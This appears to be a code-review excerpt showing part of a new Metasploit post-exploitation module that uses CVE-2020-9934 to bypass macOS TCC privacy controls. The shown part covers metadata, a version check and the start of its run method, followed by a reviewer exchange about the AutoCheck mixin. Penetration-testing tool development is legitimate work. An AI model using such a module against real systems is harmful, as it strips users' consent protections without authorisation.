modules/post/osx/escalate/tccbypass.rb

```diff
@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Bypass the macOS TCC Framework',
+        'Description' => %q{
+          This module uses the CVE-2020-9934 to bypass the TCC framework and grant all
+          permissions to the Terminal application.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'mattshockl', # discovery
+          'timwr', # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2020-9934'],
+          ['URL', 'https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8'],
+          ['URL', 'https://github.com/mattshockl/CVE-2020-9934'],
+        ],
+        'Platform' => [ 'osx' ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ]
+      )
+    )
+    register_options([
+      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
+    ])
+  end
+
+  def check
+    version = Gem::Version.new(get_system_version)
+    if version >= Gem::Version.new('10.15.6')
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def run
+    if check != Exploit::CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
```

Comment:
Is AutoCheck mixin accessible from `Post` context?

Reply:
I don't think it works with post modules currently